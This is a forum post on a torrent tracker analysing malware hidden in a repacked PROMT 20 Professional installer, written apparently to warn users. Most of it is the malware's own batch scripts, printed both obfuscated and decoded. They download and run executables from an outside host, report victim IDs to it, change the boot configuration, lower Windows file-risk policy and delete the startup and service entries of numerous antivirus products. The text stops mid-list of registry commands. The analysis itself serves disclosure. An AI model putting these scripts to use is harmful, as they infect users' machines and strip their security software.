Investigation of the virus activity of the repacked PROMT_20_Professional.exe

NNM-Club torrent tracker -> Software and everything around it -> Data protection
Poll: Is such research useful? Yes: 100% [18 votes]; No: 0% [0 votes]. Total votes: 18.

Eastoop (Deputy Program Curator) wrote:
Promt 20 (Professional, Expert, Master, Freelance, MS Office) + Dictionaries Collection [Multi/Ru]
Of the 6 distribution packages, one turned out to be repacked: PROMT_20_Professional.exe
Details of the virus activity check.
1. The user's suspicion of a virus was raised by the missing digital signature on the distribution. The releaser was unable to detect the virus and infected his own computer. When the installer was forcibly unpacked with 7-Zip, it turned out that the unpacking does not complete, but the installation configurator could nevertheless be obtained.
It turned out that the repack was made with Smart Install Maker and, besides unpacking the distribution, a batch of files for downloading viruses is loaded into the system.

2. Running it on a virtual machine made it possible to obtain this set of starter files. When the infected installer runs, the file set-up.exe (the original installer) is unpacked into the windows folder (the unpacking takes a long time because of the file's large size), together with a file a.bat, which is launched immediately. The wget and curl folders that the batch file relies on are also created in the windows folder.
Code:
@echo off
set "a3=t"
set "j=e"
set "xj66=s"
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
s%j%%a3% "dn=("
s%j%%a3% "gdfg5=W"
s%j%%a3% "a1=h"
s%j%%a3% "jh4=8"
s%j%%a3% "n3=i"
s%j%%a3% "a2=p"
s%j%%a3% "f=x"
s%j%%a3% "a6=:"
s%j%%a3% "fsf4=o"
s%j%%a3% "gfg33=l"
s%j%%a3% "pi=r"
s%j%%a3% "k=at"
s%j%%a3% "aa2=l"
s%j%%a3% "hy=\"
s%j%%a3% "b=b"
s%j%%a3% "gt12=a"
s%j%%a3% "r=d"
s%j%%a3% "d=%jh4%8%yui%%jh4%"
s%j%%a3% "hh=st"
s%j%%a3% "z=%xj66%%a2%%c44%c%j%"
s%j%%a3% "bf5=d"
s%j%%a3% "kl=-"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "c=w"
s%j%%a3% "yt=="
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "b2=dy"
s%j%%a3% "e9=)"
s%j%%a3% "v1=n"
s%j%%a3% "a4=/"
s%j%%a3% "g1=%windir%"
s%j%%a3% "a7=rs"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%"
::
::-----------------------------------------------------------------
::     e:   %j%%f%%j%    m: m%xj66%%n3%
::--------------------------------------|       |------------------
%s5% %a4%%r8% %g1%%hy%S%j%%a3%-u%a2%%a5%%j%%f%%j%
%n3%f %j%%f%%n3%s%a3% "%g1%%hy%y%a5%t%f%t" d%j%l %0
::
:: [147 empty "::" comment lines omitted here; the obfuscator pads the script with them]
s%j%t osver=Unknown
v%j%r | findstr /IL "5.1." > nul
%n3%F %errorlevel% EQU 0 s%j%t "osver=Windows_XP"
%n3%F %osver% == Windows_XP %dn%
go%a3%o n
%e9% %j%ls%j% %dn%
go%a3%o y
%e9%
:y
s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3%
f%fsf4%%pi% %a4%f %zx3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%zx3% %%i %gs1% %dn%%zx3%%ss%%zx3%%e9% d%fsf4% s%j%%a3% %%~i
set "ua=%sid%"
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%b%%k%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%c44%%gfg33%%a2%%a1%%gt12%%zx3% %kl%%kl%u%xj66%e%pi%%kl%%c44%g%j%n%a3%%yt%%zx3%%ua%%zx3%
%n3%f %j%%f%%n3%st %zx3%%g1%%a4%%b%%a5%%b%%k%%zx3% %dn%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% %kl%c %kl%P %zx3%%g1%%zx3% %zx3%%l%%a4%%b%%a5%%j%%f%%j%%zx3% %kl%%kl%%pi%%j%f%j%%pi%%j%%pi%%yt%%zx3%%gt12%%aa2%%a2%%a1%%c44%%zx3%
%s5% %a4%%r8% %g1%%hy%%b%%a5%%j%%f%%j%
%e9% %j%%aa2%s%j% %dn%
go%a3%o n
%e9%
d%j%l %0
:n
d%j%%aa2% %0
::
Code:
@echo off
set "a3=t"
set "j=e"
set "xj66=s"
set "yui=5"
set "zx3=""
set "gs1=in"
set "a5=."
set "c44=a"
set "dn=("
set "gdfg5=W"
set "a1=h"
set "jh4=8"
set "n3=i"
set "a2=p"
set "f=x"
set "a6=:"
set "fsf4=o"
set "gfg33=l"
set "pi=r"
set "k=at"
set "aa2=l"
set "hy=\"
set "b=b"
set "gt12=a"
set "r=d"
set "d=8858"
set "hh=st"
set "z=space"
set "bf5=d"
set "kl=-"
set "r8=normal"
set "c=w"
set "yt=="
set "s5=start"
set "b2=dy"
set "e9=)"
set "v1=n"
set "a4=/"
set "g1=%windir%"
set "a7=rs"
set "l=http://8858.space/rs/st"
::
::-----------------------------------------------------------------
::     e:   exe    m: msi
::--------------------------------------|       |------------------
start /normal %windir%\Set-up.exe
if exist "%windir%\y.txt" del %0

set osver=Unknown
ver | findstr /IL "5.1." > nul
iF %errorlevel% EQU 0 set "osver=Windows_XP"
iF %osver% == Windows_XP (
goto n
) else (
goto y
)
:y
set ss=s.txt
for /f "usebackq delims=" %%i in ("%ss%") do set %%~i
set "ua=%sid%"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.bat" --referer="alpha" --user-agent="%sid%"
if exist "%windir%/b.bat" (
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/b.exe" --referer="alpha"
start /normal %windir%\b.exe
) else (
goto n
)
del %0
:n
del %0
::
3. As a result of the batch file's execution, two more files are downloaded into the windows folder: b.bat and b.exe. The first continues downloading the next batch of files, and the second protects and restores the batch file and keeps it running.
Code:
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
s%j%%a3% "yui=5"
s%j%%a3% "zx3=""
s%j%%a3% "gs1=in"
s%j%%a3% "gdfg5=W"
s%j%%a3% "a5=."
s%j%%a3% "c44=a"
s%j%%a3% "dn=("
s%j%%a3% "ssd3=R"
s%j%%a3% "a1=h"
s%j%%a3% "dfg=="
s%j%%a3% "jh4=8"
s%j%%a3% "n3=i"
s%j%%a3% "a2=p"
s%j%%a3% "f=x"
s%j%%a3% "a6=:"
s%j%%a3% "fsf4=o"
s%j%%a3% "lkj6=K"
s%j%%a3% "gfg33=l"
s%j%%a3% "pi=r"
s%j%%a3% "yr3=""
s%j%%a3% "k=at"
s%j%%a3% "yfb={"
s%j%%a3% "aa2=l"
s%j%%a3% "vbvc56=O"
s%j%%a3% "hy=\"
s%j%%a3% "b=b"
s%j%%a3% "gt12=a"
s%j%%a3% "gdg5=M"
s%j%%a3% "r=d"
s%j%%a3% "d=%jh4%8%yui%%jh4%"
s%j%%a3% "hh=st"
s%j%%a3% "z=%xj66%%a2%%c44%c%j%"
s%j%%a3% "bf5=d"
s%j%%a3% "kl=-"
s%j%%a3% "r8=no%pi%m%gt12%%aa2%"
s%j%%a3% "c=w"
s%j%%a3% "yt=="
s%j%%a3% "s5=%xj66%%a3%ar%a3%"
s%j%%a3% "b2=dy"
s%j%%a3% "e9=)"
s%j%%a3% "v1=n"
s%j%%a3% "a4=/"
s%j%%a3% "g1=%windir%"
s%j%%a3% "a7=rs"
s%j%%a3% "l=%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%%z%%a4%%a7%%a4%%hh%"
s%j%%a3% "mdp5=--%pi%%j%f%j%%pi%%j%%pi%"
s%j%%a3% "hg4=%c44%%gfg33%%a2%%a1%%gt12%"
::
s%j%%a3% %xj66%s%yt%s%a5%t%f%%a3%
f%fsf4%%pi% %a4%f %yr3%u%xj66%%j%b%gt12%ckq d%j%l%n3%m%xj66%=%yr3% %%i %gs1% %dn%%yr3%%ss%%yr3%%e9% d%fsf4% s%j%%a3% %%~i
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
::
:: [137 empty "::" comment lines omitted here; the obfuscator pads the script with them]
%pi%%j%g d%j%l%j%t%j% %yr3%H%lkj6%L%gdg5%%hy%S%vbvc56%FT%gdfg5%A%ssd3%E%hy%%gdg5%%n3%c%pi%%fsf4%s%fsf4%f%a3%%hy%%gdfg5%%n3%nd%fsf4%w%xj66%%hy%Cu%pi%r%j%n%a3%V%j%%pi%s%n3%%fsf4%n%hy%Un%n3%n%xj66%%a3%al%aa2%%hy%%title%%yr3% %a4%f %a4%r%j%g%a6%32
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%%j%%f%%j%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%%b%%k%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%d%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_n%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%mg%pi%_f%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%u%xj66%w%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%%c44%t%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%c%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%e%a3%%a5%r%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%t%hy%b%n3%n%hy%wg%j%t%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%m%a3%%a5%%pi%%j%g%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
%pi%%j%g%j%d%n3%t %a4%s %g1%%hy%c%a5%r%j%g
bc%bf5%%j%d%n3%t %a4%s%j%t %yr3%%yfb%cu%pi%r%j%n%a3%}%yr3% s%gt12%f%j%boo%a3% %yr3%m%n3%n%n3%m%gt12%%aa2%%yr3%
d%j%%aa2% %g1%%hy%b%a5%%j%%f%%j%
d%j%l %g1%%hy%c%a5%r%j%g
%g1%%hy%cu%pi%%aa2%%hy%cu%pi%%aa2%%a5%%j%%f%%j% %yr3%%a1%%a3%%a3%%a2%%a6%%a4%%a4%%d%%a5%s%a2%%gt12%c%j%%a4%cu%pi%%aa2%%a4%%pi%un%n3%%a5%%a2%h%a2%?%xj66%ub%n3%d%yt%%pos%%sym%%sub%%yr3% %mdp5% %yr3%%hg4%%yr3%
%g1%%hy%%gdfg5%g%j%%a3%%hy%b%n3%n%hy%wg%j%%a3%%a5%%j%%f%%j% -c -P %yr3%%g1%%yr3% %yr3%%l%%a4%y%a5%%a3%x%a3%%yr3% %mdp5%%dfg%%yr3%%hg4%%yr3%
d%j%%aa2% %0
::
Code:
@echo off
::
set "sym=_"
set "a3=t"
set "j=e"
set "xj66=s"
::
set "yui=5"
set "zx3=""
set "gs1=in"
set "gdfg5=W"
set "a5=."
set "c44=a"
set "dn=("
set "ssd3=R"
set "a1=h"
set "dfg=="
set "jh4=8"
set "n3=i"
set "a2=p"
set "f=x"
set "a6=:"
set "fsf4=o"
set "lkj6=K"
set "gfg33=l"
set "pi=r"
set "yr3=""
set "k=at"
set "yfb={"
set "aa2=l"
set "vbvc56=O"
set "hy=\"
set "b=b"
set "gt12=a"
set "gdg5=M"
set "r=d"
set "d=8858"
set "hh=st"
set "z=space"
set "bf5=d"
set "kl=-"
set "r8=normal"
set "c=w"
set "yt=="
set "s5=start"
set "b2=dy"
set "e9=)"
set "v1=n"
set "a4=/"
set "g1=%windir%"
set "a7=rs"
set "l=http://8858.space/rs/st"
set "mdp5=--referer"
set "hg4=alpha"
::
set ss=s.txt
for /f "usebackq delims=" %%i in ("s.txt") do set %%~i
set "title=%rn%"
set "sub=%sid%"
set "pos=%pid%"
::
reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%rn%" /f /reg:32
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.bat" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.exe" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.exe" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.bat" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/c.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/e.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/d.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_n.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mgr_f.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/usw.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/at.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/ct.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/et.reg" --referer="alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/mt.reg" --referer="alpha"
regedit /s %windir%\c.reg
bcdedit /set "{current}" safeboot "minimal"
del %windir%\b.exe
del %windir%\c.reg
%windir%\curl\curl.exe "http://8858.space/curl/runi.php?subid=%pid%_%sid%" --referer "alpha"
%windir%\Wget\bin\wget.exe -c -P "%windir%" "http://8858.space/rs/st/y.txt" --referer="alpha"
del %0
::
4. When b.bat runs, several more files are downloaded which work together: they spread copies across system folders, register themselves in autorun and the Task Scheduler, disable booting into safe mode and the loading of antivirus products, and so on.
List of downloaded files:
at.reg
c.bat
c.exe
c.reg
ct.reg
d.bat
d.exe
d.reg
e.reg
et.reg
mgr_f.reg
mgr_n.reg
mt.reg
usw.reg
Some of the files have identical contents and simply duplicate each other to make removing the infection harder.
Code:
@echo off
::
::
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
) else (
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=868" /f /reg:32
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
)
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE4.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE3.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP20.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP19.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
